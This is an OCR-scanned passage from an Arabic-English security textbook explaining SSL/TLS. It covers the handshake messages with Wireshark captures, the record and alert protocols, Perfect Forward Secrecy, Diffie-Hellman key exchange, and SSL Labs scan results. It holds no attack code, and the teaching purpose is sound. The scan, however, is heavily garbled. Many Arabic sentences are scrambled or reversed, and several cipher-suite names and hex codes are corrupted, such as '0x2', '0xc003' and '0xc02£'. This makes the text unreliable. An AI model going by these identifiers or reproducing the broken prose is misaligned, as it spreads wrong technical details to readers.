process, the Certification Authority will validate your details and issue an SSL Certificate containing your 
details and allowing you to use SSL. Your web server will match your issued SSL Certificate to your 
Private Key. Your web server will then be able to establish an encrypted link between the website and 
your customer's web browser. 


Typically an SSL Certificate will contain your domain name, your company name, your address, your 
city, your state and your country. It will also contain the expiration date of the Certificate and details of 
the Certification Authority responsible for the issuance of the Certificate. When a browser connects to a 
secure site it will retrieve the site's SSL Certificate and check that it has not expired, it has been issued by 
a Certification Authority the browser trusts, and that it is being used by the website for which it has been 
issued. If it fails on any one of these checks the browser will display a warning to the end user letting 
them know that the site is not secured by SSL. 
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يعمل بروتوكول ال SSL‏ فوق ال «Transport Layer‏ أي فوق ال .TCP‏ فهو يعمل ك Socket‏ بين ال Application‏ 
Layer‏ وال ests «Transport Layer‏ بتأمین الإتصال لل Applications‏ التى تعتمد على ال TCP‏ كبروتوكول لنقل 


ال CS Data‏ يظهر بالشكل التالي: 


يقوم ال SSL‏ بخدمة ال Application Layer Protocols‏ کال “HTTP‏ ويعتمد على ال TCP‏ في ike‏ نقل ال 
Gu Messages‏ ال Web Servers‏ وال .Browsers‏ 
والآن.. سنبداً بتغطية ال SSL‏ بشىء 


SSL SSL Change | cci Alert EC ګګ‎ 
Handshake | Cipher Spec Protocol HTTP القيقة» لا یعمل ال‎ das من ال‎ 
Protocol Protocol 


Xm في طبقة وحيدة أي أنه لا‎ SSL 


!..Single Protocol‏ ولكن Jes‏ في 
طبقتين فوق ال TCP‏ کا بظهر 
بالشكل. أيضاً بُظهر لنا الشكل بعض 
التفاصيل الخاصة بهذا البروتوکول» 

“SSL Protocol Stack” 


SSL Record Protocol 


Cryptography 
[392] 


کا لاحظ أنه Jats‏ طبقتين: 
«(Two Layers)‏ إحداهم لل «SSL Record Protocol‏ والأخرى التي تَشْمّل ثلاثة بروتوکولات eub»‏ ال SSL‏ 


في إدارة عملية ال Message Exchanges‏ بين الطرفين. 


يتم إنشاء ال Connection‏ على مر حلتين: 
* المرحلة الأولى وهی ال .Handshake Phase‏ 


.Secure Data Transfer Phase الرحلة الثانية وهی‎ m 


Handshake Phase 
خول نوع ال‎ (Negotiate) والتفاوض‎ «Server وال‎ Client بين ال‎ Authentication تتم في هذه المرحلة عملية ال‎ 


.Data تأمين إرسال ال‎ à اة‎ Keys وال‎ Cryptographic Algorithms 


مايل شكل يوضح ال Messages‏ التى تتم خلال هذه المرحلة بين ال Client‏ وال Server‏ 


Xs‏ ال Handshake Protocol‏ هنا السوول عن عملية ال Authentication‏ وال Negotiation‏ هذه. 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماره‎ 


SSL Client SSL Server 


Internet » 
Handshake Protocol 
Handshake: Client Hello 
———————————————————————————————— 


Handshake: Server Hello 
9 


Handshake: Server Certificate 
$$ 


Handshake: Server Key Exchange (Optional) 
Handshake: Client Certificate Request (Optional) 


Handshake: Server Hello Done 
on _ _____ _ __ _ _ _ 


Handshake: Client Certificate (Optional) 


Handshake: Client Key Exchange 
—————————————————— 


Handshake: Client Certificate Verify (Optional) 
e TM 


Change Cipher Spec 


Handshake: Client Finished Message 
Change Cipher Spec 
a I ا‎ < 
Handshake: Server Finished Message 
Record Protocol 


Application Data 
D س ي س‎ a 
Source: network baseline blog 


نبدأ بأول Message‏ وهی ال “Client Hello"‏ 
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يقوم ال Client (Browser)‏ هنا ببدء ال Session‏ مع ال Web Server‏ عن طريق إرسال هذه ال «Msg‏ وتحوي 
الاتي: 
Version‏ 


The Client sends the version number that it supports. For example, for SSLv3, the version 
number is 3.0. For TLS, the version number 1s 3.1. 


Random 
«i Connection IN Client وال‎ Server يختارة كل من ال‎ 26 Byte هو عبارة عن رقم عشوائي مُكوّن من‎ 
Session ID (if any) 


This is included if the Client wants to resume a previous session. If the Session ID Length is O, it 
indicates a new session. 


Cipher Suite 
This is the list of cipher suites that are supported by the Client. 


Jess,‏ لتوضیح هذا ال Cipher Suite‏ سَنعرض أحدهم: 
(TLS RSA WITH DES CBC SHA)‏ 


TLS is the protocol version, RSA is the algorithm that will be used for key exchange, DES. CBC 
is the encryption algorithm, and SHA is the hash function. 


ولكن ماهذا ال CBC‏ الْمستَخِدّم مع ال ¥..DES Cryptosystem‏ 
إنه أحد ال آنواع ال “Modes of Operation"‏ الْمستخدَمَة في تشفير ال Blocks of Data‏ بغرض زيادة التعقيد في 
العلاقة بين ال Plaintext‏ وال .Ciphertext‏ 


-WireShark تم التقاطها بال‎ “Client Hello” J مثال‎ | LU 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومارنه‎ 


5 Secure Socket Layer 


E] ۲۱5۷1 Record Layer: Handshake Protocol: client Hello 
Content Type: Handshake (22) 
version: TLS 1.0 (0x0301) 
Length: 176 
د‎ Handshake Protocol: Client Hello 
Handshake Type: client Hello (1) 


Length: 172 
version: TLS 1.0 (0x0301) 
3 Random 


gmt. unix time: May 12, 2010 000000000 
random bytes: SLFFBC966115DD8D54CBD0778D708AC9B4E1244364AFC4C5... 

Session ID Length: 0 

Cipher suites Length: 72 

=| Cipher suites (36 suites) 

Cipher suite: unknown (OxOOff) 
Cipher suite: TLS ECDHE. ECDSA WITH AES. 256, CBC SHA COxc0Qa) 
Cipher suite: TLS. ECDHE. RSA WITH. AES. 256, CBC. SHA (0xc014) 
Cipher suite: TLS DHE RSA WITH. CAMELLIA 256 CBC. SHA (0x0088) 
Cipher suite: TLS. DHE. DSS. WITH. CAMELLIA 256. CBC SHA (0x0087) 
Cipher suite: TLS DHE. RSA WITH. AES 256. CBC. SHA (0x0039) 
Cipher suite: TLS DHE. DSS. WITH. AES. 256, CBC. SHA (0x0038) 
Cipher suite: TLS ECDH. RSA WITH AES 256. CBC SHA (OxcOOf) 
Cipher suite: TLS. ECDH. ECDSA, WITH AES. 256. CBC. SHA (0xc005) 
Cipher suite: TLS RSA WITH CAMELLIA 256. CBC SHA (0x0084) 
Cipher suite: TLS RSA WITH AES 256 CBC SHA (0x0035) 
Cipher suite: TLS. ECDHE. ECDSA, WITH RC4. 128. SHA (0xc007) 
Cipher Suite: TLS ECDHE ECDSA WITH AES 128 CBC SHA COxc009) 
Cipher suite: TLS. ECDHE. RSA WITH RC4. 128. SHA COxcO11) 
Cipher suite: TLS. ECDHE. RSA, WITH AES. 128 CBC. SHA (0xc013) 
Cipher suite: TLS DHE RSA WITH. CAMELLIA 128 CBC. SHA (0x0045) 
Cipher Suite: TLS DHE. DSS. WITH. CAMELLIA 128 CBC  SHA (0x0044) 
Cipher suite: TLS DHE RSA WITH. AES 128 CBC. SHA (0x0033) 
Cipher suite: TLS. DHE. DSS. WITH. AES. 128, CBC, SHA (0x0032) 


نستنتج من خلال البدائل المطروحة تحت ال cipher suites‏ أن هذا ال browser‏ يدعم خاصية ال PFS‏ وتعنی: 
(Perfect Forward Secrecy)‏ 
وذلك بسبب إعطاء أولوية لنوعين هم -(DHE and Elliptical DH)‏ 


سنتتحدث عن هذه الخاصية بعد قليل.. 
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لاحظ في الشكل السابق البروتوكول eda li‏ وهو ال «Handshake‏ وال gag Handshake Type‏ ال Client‏ 
«Hello‏ أيضاً ال Version‏ وال m: «Random‏ ال Session ID‏ وقيمتة "صفر" عي يعني آنها Session‏ جدیدة!. 

Web على ال‎ Browser في هذه الرسالة وهو الاحتالات أو البدائل التي یعرضها ال‎ Parameter e لنا‎ gius 
بها في الرسالة التي‎ Browser وإبلاغ ال‎ Cipher Suites باختيار واحدة من هذه ال‎ Server کي يقوم ال‎ Server 


"Server Hello” وهی ال‎ «Kb 


:WireShark تم التقاطها بال‎ Server ii من نوع 6 قادمة من طرف‎ Message bls 


Secure Socket Layer 
El ۲۱۵۷1 Record Layer: Handshake Protocol: Server Hello 
content Type: Handshake (22) 
version: TLS 1.0 (0x0301) 
Length: 74 
El Handshake Protocol: server Hello 
Handshake Type: Server Hello (2) 


Length: 70 
Version: TLS 1.0 (0x0301) 
E Random 


gmt unix time: Aug 21, 1993 21:03:18.000000000 

random bytes: 2986353573E24C5EFC4 3B8B6CC804E3300B4553CE02021B2... 
Session ID Length: 32 
Session ID: l1CE394ACODATB3COO61770630CFCOBDG66EEE480A23ACCDEEE... 
Cipher suite: TLS RSA WITH 3DES. EDE CBC. SHA (Ox000a) 
compression Method: null (0) 


o‏ في السطر قبل الأخير أن ال Web Server‏ قام باختيار أحد البدائل» ونستنتج من اختياره هذا مايلي: 


The long-term keys are used both for the server's authentication and for the session key 
generation by means of RSA key exchange mechanism. 
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liag‏ يعني أن ال server‏ لم يتم ضبط الاعدادات لديه ليختار أحد البدائل التي تدعم خاصية ال PFS‏ تذكر هذا ال 
cipher suite‏ الذي اختاره ال server‏ لأننا سنتحدث عنه في فقرة ال .PFS‏ 

.Hello Message ال‎ gag Handshake Phase JI تنتهي أو ل خطوة في‎ Ie» 

هذا الشكل بلص لنا هذه الخطوة: 


Client Server 


Establish security capabilities, including 
protocol version, session ID, cipher suite, 
compression method, and initial random 
numbers. 


سننتقل إلى الخطوة الثانية في هذا ال Phase‏ وهی ال "Authentication and Key Exchange"‏ 


تبدأ هذه الخطوة بأن يقوم ال Web Server‏ بإرسال ال Certificate‏ الخاصة 4 إلى ال «Browser‏ وتحوي ال Public‏ 
Key‏ الخاص „Server JL‏ 

هذا ال Server's Public Key‏ سيستخدمة ال Browser‏ بعد قليل في الخطوة الثالثة لإرسال Key‏ جديد يقوم 
بانشاوه "Pre Master Secret Key" peo‏ إلى ال Server‏ 


يتم إرسال ال iow Pre Master Secret Key‏ بال Server's Public Key‏ ..هذه الرسالة تکون بعنوان 


"Client Key Exchange" 
إن شاءالله.‎ (Step 3) سنشاهدها معاً في الخطوة الثالثة‎ 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومارند‎ 


Pre Master Secret Key لل‎ recover وعمّل‎ JL. JI على‎ Server’s Private Key بتطبيق ال‎ Server فيقوم ال‎ 


وما هذا ال *.."Pre Master Secret Key"‏ 
يبدو و [P‏ من "Pre Master" caoul‏ أنه Key‏ مؤقت سَیستخدمه كلاهم à‏ مُعادَلَة Key J generate oa]‏ آخر 2 
هو ال «Session key‏ سنتعرض إليهم لاحقاً.. 


مايل شكل يوضح الخطوة الثانية في هذا ال „Phase‏ 


SSL Client SSL Server 


Internet 


Handshake Protocol 


Step (2) 


Handshake: Server Certificate 


Handshake: Server Key Exchange (Optional) 
Handshake: Client Certificate Request (Optional) 


Handshake: Server Hello Done 


Source: network baseline blog 


lao‏ إرسال ال Server‏ لل Certificate‏ في أول JL. JI Gal .Message‏ الثانية التي بعنوان 


!..(Optional) مكتوب بجانبها‎ "Server Key Exchange" 
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لماذا؟ 

oY‏ ال Server‏ هنا قام باختيار UWL RSA key exchange‏ لن يكون بحاجه a (Ub‏ ينهي ال à ,la3-I Server‏ الثانية 
برسالة py "Server Hello Done"‏ ها ال Client‏ أنه cal‏ هذه الخطوة» وينتظر الرد من طرف ال .Client‏ 
Session dee‏ لول رسالة آرسلها ال Server‏ التي تحوي ال Certificate‏ 


لاحظ el‏ تحوي ال Public Key‏ الخاص بال Server‏ )65 تحديده بالأسفل)» 


Content Type: Handshake (22) 
version: TLS 1.0 (0x0301) 
Length: 4379 


Handshake Type: certificate (11) 
Length: 4375 
Certificates Length: 4372 

El 

Certificate Length: 1490 


۱۱۱۱۱۱۱۵۳۱۱ 3111 2 ۸۸ s 


Certificate Length: 1570 
& Certificate (id-at-commonName-verisign Class 3 Extended validation SSL SGC 
Certificate Length: 1303 
Certificate (id-at-commonNamesverisign Class 3 Public Primary certification 
E signedcertificate 
version: v3 (2) 
serialNumber : Ox57bffbo3sfb2c46d4eloecee0d7437f13 
signature (shawithRsAEncryption) 
issuer: rdnsequence (0) 
validity 
subject: rdnsequence (0) 
subjectPublickeyrnfo 
& algorithm (rsaEncryption) 
Padding: à 
subjectPublickey: 3082010A0282010100AF240808297A359E600CAAE74B3B4E. . J 
Source: network baseline blog 


+] 


Em 


Bl ۴ 


نا تنتهى الخطوة الثانية في ال .Handshake Phase‏ 
نم تبدأ الخطوة الثالثة )3 (Step‏ 
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Understanding Hacking and Information Security القرصنة الإلكترونية مأمن المعلوماته‎ 


SSL Client SSL Server 


Internet 


Medis د موه‎ 
Step (3) 


Handshake: Client Certificate (Optional) 
Handshake: Client Key Exchange 


Handshake: Client Certificate Verify (Optional) 


Change Cipher Spec 


Handshake: Client Finished Message 


Source: network baseline blog 


"Pre Master Secret Key" فيا بينهم وهو‎ "Shared Key” على‎ Server وال‎ Client التوافق بين ال‎ wit وفيها‎ 


الذي ذكرناه من قبل. 


سنقوم بتسليط الضوء على ال Agli Messages‏ 


يظهر في الشكل الرسالة الثانية التي بعنوان "Client Key. Exchange"‏ ..وب) أنه تم اختيار ال RSA‏ من قبل.. 
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فهذه الرسالة ستحتوي على ال E> «“Pre_ Master Secret Key”‏ يقوم ال client‏ بعمل cal generate‏ وتشفيره 
باستخدام ال Server's public key‏ ثم پرسله إلى ال Server‏ 

«Master. Secret Key" آخر اسمه:‎ Key col في‎ Client وال‎ Server سَيستخدمة کل من ال‎ Key هذا ال‎ 
"Pre Master Secret Key" يتم إنتاجة بمُعادلّة يدل ما ال‎ «(One-time 48-byte value) وهو عبارة عن‎ 
"Client and Server Random values" وال‎ 

هذه ال Randoms‏ هي التي قد e‏ تبادها أثناء ال "Hello Messages"‏ في الخطوة الأولى» ويتم ذلك بتطبيق ال 


Cryptographic Hash Algorithms‏ على هذه المدخلات. 


ولكن ما $456 دخول ال "Client and Server Random values"‏ في هذه العملية؟ 

هذه ال Random‏ تعد بمثابة ال "Salt"‏ في هذه المعادلة» لكي تكون العلاقة بين المدخلات والخرجات علاقة غير 
مُباشره.. تحدثنا عن فائدة ال Salt‏ في عملية التشفير من قبل!ء هل تتذكرها؟.. الشكل التالي يوضح تفاصيل الرسالة 
التي قام ال Client‏ بارساها إلى ال Server‏ 


B Secure Socket Layer 


E ۲۱5۷1 Record Layer: Handshake Protocol: Client Key Exchange 


content Type: Handshake (22) 

Version: TLS 1.0 (0x0301) 

Length: 134 

Handshake Protocol: client Key Exchange 
Handshake Type: client Key Exchange (16) 
Length: 130 


Source: network baseline blog 
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يقوم ال Client‏ بعد ذلك بإرسال “Change Cipher Spec"‏ وتعنى أنه يبلغ ال ab Server‏ ال Messages‏ التى 


Tom‏ هذه الرسالة ستکون S‏ باستخدام ال session Key‏ الذي تم تكوينه لدى كل منهم. 


ولكن لحظة!.. هذا ال (Change Cipher Spec)‏ رأيناه من قبل! 


إنهُ أحد OVS gi Al‏ الذي OS‏ يوظفهم ال  SSL‏ إدارة عملية الإتصال. 


Change Cipher Spec Protocol 
الحالية بين ال‎ State نعل ويقوم بوظيفة وحيدة وهی نقل ال‎ lS Application Layer هذا البروتوكول يعمل 3( ال‎ 


.Current State إلى ال‎ Pending من ال‎ Server J! Client 


ماهذا ال Pending‏ وال Current..؟‏ 

هوخ الواضح أنه طوال مرحلة ال Handshake Phase‏ تكون State JI‏ الخاصة بال Connection‏ بين الطرفين غير 
مستقرة» وبمُجرّد حدوث الاتفاق بينهم وتكوين ال «Master Secret Key‏ يقوم هذا البروتوكول بتغيير DAI‏ 
eM‏ ببساطة يقوم بعمل update‏ لل Cipher Suite‏ كي يتم استخدامه طذا ال Connection‏ الحادث. وت 
لذلك.. يبدأ الطرفين بعدها بتبادل "Change Cipher Spec" JL. JI‏ 

هذا يعني Of‏ هذه الرسالة لا يتم إرساها بواسطة ال Handshake Protocol‏ بل يتم إرساها بالبروتوكول الآخر. 


وبعدها يقوم ال NC Client‏ بارسال رسالة kde få “Client finished"‏ ال Algorithms‏ وال Keys‏ الجديدة» 
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Understanding Hacking and Information Security القرصنة الإلكترونية وأمن المعلومات‎ 


"Server Finished" أيضاً. . متبوعة برسالة‎ "Change Cipher Spec" سال‎ ob بالرد عليه‎ Server فيقوم ال‎ 
del 


SSL Client SSL Server 


Internet 


Change Cipher Spec Protocol 
Change Cipher Spec 


Handshake: Server Finished Message 


Record Protocol 
Application Data 


Source: network baseline blog 


یظهر في الشکل بعد انتهاء رسالة ال Finished‏ بداية Jali‏ ال (Application Layer Data)‏ پشکل آمن وت : 


ولكن ماهذا ال "Record Protocol"‏ الذي يظهر في الشكل بالأعلى؟ 
واضح آنه البروتوكول المسؤول عن نقل ال Application Data‏ بين ال Server‏ وال Client‏ هذا البروتوكول يعمل 
فوق ال TCP‏ مباشرة.. ble‏ شکل یوضح آلية عمل هذا البروتوکول: 
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Application data 
Fragment 

Compress 
Add MAC 


Encrypt 


Append SSL 
record header 


و 
08 


بناء على الشكل» يستلم هذا البروتوكول ال Data‏ من ال Application Layer‏ ويقوم بعمل Ú Fragment‏ 
ضغطهاء وإضافة ال Message Authentication Code‏ عليهاء 4 تشفيرها e Key. Block JU‏ أخيرا إضافة ال 


67 الخاص به على ال Packet‏ وتسليمها إلى ال TCP‏ لتبداً عمَلية نقلها إلى الطرف الآخر. 


P tz 5 $‏ 74 
دعنى أريك ال SSL Protocol Architecture‏ مرة أخرى بعد أن فهمت Ales iJi‏ 
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SSL SSL Change 
Handshake | Cipher Spec 
Protocol Protocol 


SSL Alert 
Protocol 


SSL Record Protocol 


ولكن ما وظيفة هذا ال $..Alert Protocol‏ 

يبدو Lastly‏ من إسمه!.. فهو یقوم بنقل ال "SSL-related Alerts"‏ بین الطرفين» هذه ال Alerts‏ يتم نقلها داخل 
رسائل مضغوطة o tå g‏ أيضاً. هناك نوع من ال Alerts‏ يُسمى Fatal Alerts‏ يتم تبادها في حالة حدوث أي خلل 
gles‏ بعملية التواصل. 

مايل عضا منها: 


unexpected message: An improper message was received. 

handshake failure: The sender was unable to negotiate the Cipher Suite. 

bad certificate: A received certificate was contained a signature that didn't verify 
unsupported certificate: The type of the received certificate is not supported. 
certificate expired: A certificate has expired. 


بهذا نكون قد أنبينا الحديث عن بروتوكول ال SSL‏ فهو يعد من أهم البروتوكولات الْستَخدّمة في العديد من ال 


.Applications 
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Perfect Forward Secrecy (PFS) 


قبل أن نشرع بشرح هذه التقنية» سنقوم أولاً بالمرور سريعاً على آهم خطوات الثال السابق.. 

يبدأ الإتصال بعملية ال Handshake‏ حيث تتم ال e (mea [2 Authentication‏ التوافق على ال session key‏ 
الذي سيتم استخدامه في pits‏ البيانات eid‏ ال oos session‏ يمتد استخدامه لعدة مرات آخری؛ وبعدها يتم 
التخلص منه. ووظيفة ال “key exchange phase"‏ هنا هي تأمين عملية انتقال ال (cà session key‏ بينهم. في المثال 
السابق تم استخدام ال oid RSA‏ العملية» بمعنى أن ال “server’s private key”‏ پستخدم لحاية ال .session key‏ 
لکن هناك نقطة ضعف. وهي أنه إن تم وقوع هذا ال private key‏ في يد أحدهم فسيتمكن من كشف ال Session‏ 
key‏ ومن ثم الإطلاع على محتويات ال sessions‏ التي دارت بينهم!. 

وبالنسبة إلى ال Randoms‏ التي تم استخدامها مع ال pre master key‏ لتقوم بدور ال Salt‏ فإنها متاحة لدى ال 


añ attacker‏ قد تم usus‏ أثناء ال Hello messages‏ بدون تشفير!. 


ولكن T‏ الحصول على ال Slows m private key‏ 
نعم ولكن يستطيع أحدهم الإحتفاظ مبذه ال encrypted sessions‏ لديه Go‏ لشهور أو سنوات إلى أن يستطيع کسر 
هذا ال key‏ بتقدم التكنولوجيا حينهاء أو أن يتمكن من الوصول هذا ال server‏ ونسخ ال key‏ فيقوم باستخدامه 

لفك تشفير هذه البيانات التي قام بالإحتفاظ بها. 
ومن هنا جاء ال «Forward Secrecy‏ حيث يعتمد فكرة أنه إن حدث compromise‏ لل private key‏ فإنه Y‏ يؤثر 


بالتبعية على ال .session key‏ 
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الإنتقال إلى Ephemeral Diffie-Hellman‏ 
OV‏ وبعد أن تعرفنا على ikä‏ ضعف اعتاد ال session key‏ على ال private key‏ 
سنقوم باستخدام ال DH‏ هذه العملية لا له من إمكانية رائعة في التغلب على ikä‏ الضعف „loja‏ 


When we use Diffie-Hellman key exchange in SSL, it is only used for deriving a session keys, 
the authentication of the server is done by the server's private key. 

The use of Diffie-Hellman key exchange is to use a separate method to derive session key 
independent from the server's private key. 


سنوضح Er‏ 
لنتصور معا أنه وجود طرفان يتواصلان باستخدام ال «DH‏ وفي نفس الوقت سنعرّض هذه القناة للاختراق لنری 


مايمكن أن يحدث! 


Blue Mixed Mixed 
Sara Bob 


eav esdroper (but he cant unmix them!) 


GGG. مُه‎ 6d» © 


Blue Red Mixed Mixed Green Blue 
(known to (Secret) (Blue*Red) (Blue*Green) (Secret) (known to 
each other) each other) 
z 4 “ 0 
سل‎ b 6 ” 
Mixed Bob + Secret Mixed Sara + Secret 
(Blue+Green) (Red) (Blue+Red) (Green) 
Cryptography 
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سيقوم Bob‏ و Sara‏ بالتوافق على لون فيا dues‏ وليكن اللون "الازرق" فيلتقطه السيد 
ly. . eavesdropper‏ 1 

d‏ يقوم كل منهم على حدة باختيار لون آخر دون أن بر الطرف الآخر به!ء أي أنه آمر سري لكل 
طرف. فقامت Sara‏ باختيار اللون "الأحمر"» وقام Bob‏ باختيار اللون "ال"خضر" ahs‏ هذين 
اللونين ال ds . "private key”‏ يتمكن ال eavesdropper‏ من معرفة اللونين لأنه i‏ يتم تبادهم عبر 
القناة!. 

وبعد ذلك يقوم كل طرف بخلط اللونين cles‏ أي اللون الأزرق مع اللون السري الذي تم اختياره. 
فینتج ذلك ال Mixed‏ لكل منهم. هذا ال fist Mixed‏ ال “Public key"‏ 

ثم يقوم كل طرف بإرسال هذا ال Mixed‏ إلى الطرف الآخرء وهنا يتمكن ال eavesdropper‏ من 
التقاطهم!. 

لکن مهلا.. هذا ال Mixed color‏ لن يتمكن ال eavesdropper‏ من تحليل الألوان الداخلة في تکوینه!» 
هو فقط يستطيع رؤية ناتج عملية الخلط هذه. 

والان نأتي للخطوة الأخيره.. 

يقوم كل طرف بخلط اللون السري الخاص به مع ال Mixed‏ الذي استقبله من الطرف الآخرء فتكون 
المحصلة لدى الطرفين متشاممة» وهي الالوان الثلاثة» الأزرق والأحمر والأخضر!ء 

آي نفس ال "Key"‏ و تطلق عليه "shared key"‏ 


و يتمكن ال eavesdropper‏ من معرفة هذا ال shared key‏ بالرغم من تجسسه على قناة الاتصال 
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الشكل التالي يعبر عن هذه العملية باستخدام الأرقام: 


common number = 2 


random number - 4 random number - 5 


24 -16 2? -32 


3532 16 


22*- 1,048,576 |16^-1,048,576 


= The number (1,048,576) is the shared secret. 

= The numbers (16 and 32) are the public keys. 

= The random numbers (4 and 5) are the private keys. 

= The common number (2 in this example) would normally be passed system-to-system as 
part of the application's negotiation. 


لقد عرفنا فكرة عمل ‘Diffie-Hellman‏ فاذا تعنى لفظة “Ephemeral”‏ هذه؟ 
بالإسقاط على مثال الألوان» ففي كل مرة يقوم ال client‏ بببدء session‏ جديدة مع ال server‏ يتم اختيار لونين 


PFS ال‎ e وهذا ماحقق مفهو‎ "New Random intgers” جديدين» أي‎ Secret Colors o ~ 


Static Diffie-Hellman key exchanges always use the same Diffie-Hellman private keys. So, each 
time the same parties do a DH key exchange, they end up with the same shared secret. 

When a key exchange uses Ephemeral Diffie-Hellman (DHE), a temporary DH key is generated 
for every connection and thus the same key is never used twice. This enables “Forward Secrecy”. 


* Note- The perfect forward secrecy offered by (DHE) comes at a price, “more computation". 
The (ECDHE) variants use elliptic curve cryptography to reduce this computational cost. 
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كيف نعرف أن ال Server‏ أو ال Browser‏ يدعم ال PFS..؟‏ 
عن طريق الإتصال بال Server‏ سيظهر لك ال cipher suite‏ الُستخدم بینکم کمایلی: 
Page Info - https://www.ssllabs.com/ssltest/analyze.html?d=f5.com‏ بقع SLD) ‘//www-sslll‏ | 


DE t & E 


General Media Permissions Security 


FS 
Website Identity A) FS 
Website: www.ssllabs.com 
Owner This website does not supply ownership information. SE 
Verified by: Entrust, Inc. 5 
) FS 


Privacy & History 
Have I visited this website prior to today? No 


Is this website storing information (cookies) on my 


computer? Tes 


Have I saved any passwords for this website? No 


Technical Details 
C a> 
The page you are viewing was encrypted before being transmitted over the Internet. s 


Encryption makes it difficult for unauthorized people to view information traveling between FS 
computers. It is therefore unlikely that anyone read this page as it traveled across the network. 


TLS_ECDHE_RSA_WITH_AES_128_CBC_SHA (0xc013) ECDH secp384r (eq. 7680 bits RSA) FS 


= RSA keys are used here for authentication purposes 
= ECDHE is for the key exchange 


" AES is for the encryption itself 
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آیضاً یمکنك اختبار أي موقع أو Server‏ عن طريق هذا الرابط: 
https://www.ssllabs.com/ssltest/index.html‏ 
مايل مثال لوقع e‏ اختباره بواسطة Qualys ssl labs‏ 


s x‏ عا اح سس 


bs.com/ssltest/analyze.html?d- .com 82 c || search 


۱ *8B8 ¥ 


»ssed on: Mon, 26 Jun 2017 14:16:55 UTC | Hide | Clear cache 


Scan Another » 


Overall Rating 


A* عه‎ 


Cipher Strength 


Visit our documentation page for more information, configuration guides, and books. Known issues are documented here. 


Certificate #1: RSA 2048 bits (SHA256withRSA) 


==] Server Key and Certificate #1 
+Q 


' .com 
Fingerprint SHA256: 36b1c5041bb7dfd5704cb08bfíd357a45831279f10cfbefb3d3eb376b2c21f45d 
in SHA256: UIBTL4VnAeBuzITuiJO/KZmStt329alqFJcHKJv8z.Jl- 
m — a 3 


وهذه ال cipher suite‏ التى يدعمها هذا الموقع: 
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] Cipher Suites 
# TLS 1.2 (suites in server-preferred order) = 
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02£) ECDH secp384r1 (eq. 7680 bits RSA) FS 128 
TLS ECDHE RSA WITH AES 128 CBC SHA(0xc013) ECDH secp384r! (eq. 7680 bits RSA) FS 128 
TLS ECDHE RSA WITH, AES. 128 CBC, SHA256 (0xc027) ECDH secp384r1 (eq. 7680 bits RSA) FS 128 
TLS ECDHE RSA WITH AES. 256 GCM SHA384 (0xc030) ECDH secp384r1 (eq. 7680 bits RSA) FS 256 
TLS ECDHE RSA WITH AES 256 CBC  SHA(0xc014) ECDH secp384r1 (eq. 7680 bits RSA) FS 256 
TLS ECDHE, RSA WITH, AES. 256 CBC, SHA384 (0xc028) ECDH secp384r1 (eq. 7680 bits RSA) FS 256 
TLS RSA WITH AES 128 GCM SHA256 (0x9c) 128 
TLS RSA WITH AES 128 CBC SHA (0x2) 128 
TLS RSA WITH AES 128 CBC SHA256 (0x3c) 128 
TLS RSA WITH AES 256 GCM SHA384 (0x9d) 256 
TLS RSA WITH AES 256 CBC, SHA (0x35) 256 
TLS RSA WITH AES 256 CBC, SHA256 (0x3d) 256 
# TLS 1.1 (suites in server-preferred order) El 
TLS ECDHE RSA WITH AES 128 CBC SHA(0xc013) ECDH secp384r! (eq. 7680 bits RSA) FS 128 
TLS ECDHE RSA WITH AES 256 CBC, SHA (0xc014) ECDH secp384r1 (eq. 7680 bits RSA) FS 256 
TLS RSA WITH AES 128 CBC SHA (0x2) 128 
TLS RSA WITH AES 256 CBC SHA (0x35) 256 
# TLS 1.0 (suites in server-preferred order) 5 
TLS ECDHE RSA WITH AES 128 CBC, SHA(0xc013) ECDH secp384r1 (eq. 7680 bits RSA) FS 128 


TLS ECDHE RSA WITH AES 256 CBC SHA(0xc014) ECDH secp384ri (eq. 7680 bits RSA) FS 256 


@ | PA ١ (Wb Sl cR | 9ه‎ | um 


لاحظ إعطاء الأولوية إلى ال cipher suites‏ التى تدعم ال ‘PFS‏ 


وهذا آخر جزء وهو خاص بال Protocol Details‏ 


ويظهر ہا خاصية ال .Forward Secrecy‏ 
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القرسنة الإلكترونية gals‏ المعلومات 


:om/ssitest/analyze.html?d=f5.com 


EJ] © || ۵ search 


=) 


DROWN 


Secure Renegotiation 

Secure Client-Initiated Renegotiation 
Insecure Client-Initiated Renegotiation 
BEAST attack 

POODLE (SSLv3) 

POODLE (TLS) 

Downgrade attack prevention 
SSL/TLS compression 

RC4 

Heartbeat (extension) 

Heartbleed (vulnerability) 
Ticketbleed (vulnerability) 

OpenSSL CCS vuln. (CVE-2014-0224) 


OpenSSL Padding Oracle vuin. 
(CVE-2016-2107) 


No, server keys and hostname not seen elsewhere with SSLv2 


(1) For a better understanding of this test, please read this longer explanation 
(2) Key usage data kindly provided by the Censys network search engine; original 
(3) Censys data is only indicative of possible key and certificate reuse; possibly ou 


Not mitigated server-side (more info) TLS 1.0: 8 
No, SSL 3 not supported (more info) 

No (more in 

Yes, TLS FALLBACK SCSV supported (more info) 
No 

No 

No 

No (more info 

No (more info) 

No (more info) 


No (more info) 


With modern browsers 


ALPN 
NPN 
Session resumption (caching) 
Session resumption (tickets) 
OCSP stapling 

jal |‏ ا 


No 
No 
Yes 
No 
No 


a  .—] وى‎ 9a | i 


يمكنك أيضاً إجراء نفس الإختبار للمتصفح الخاص بك! 
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FireFox وهو‎ cg التی یدعمها التصفح الخاص‎ cipher suites JL نتائج الاختبار الخاصة‎ Lb 


x waccUT | 
illabs.com/ssltes(/viewMyClient.htmi ) mic | | Q Search | *" 
SSL3 No 
SSL2 No 
Cipher Suites (in order of preference) 
rej TLS. ECDHE. ECDSA, WITH, AES. 128. GCM. SHA256 (0xc02b) Forward Secrecy 128 
TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256 (0xc02£f) Forward Secrecy 128 
TLS ECDHE ECDSA WITH CHACHA20 POLY1305 SHA256 (0xcca93) Forward Secrecy 256 
TLS ECDHE RSA WITH CHACHA20 POLY1305 SHA256 (0xcca8) Forward Secrecy 256 
TLS ECDHE ECDSA WITH AES 256 GCM SHA384 (0xc02c) Forward Secrecy 256 
TLS ECDHE RSA WITH AES 256 GCM SHA384(0xc030) Forward Secrecy 256 
TLS ECDHE ECDSA WITH AES 256 CBC SHA(0xc00a) Forward Secrecy 256 
TLS ECDHE ECDSA WITH AES 128 CBC SHA(0xc003) Forward Secrecy 128 
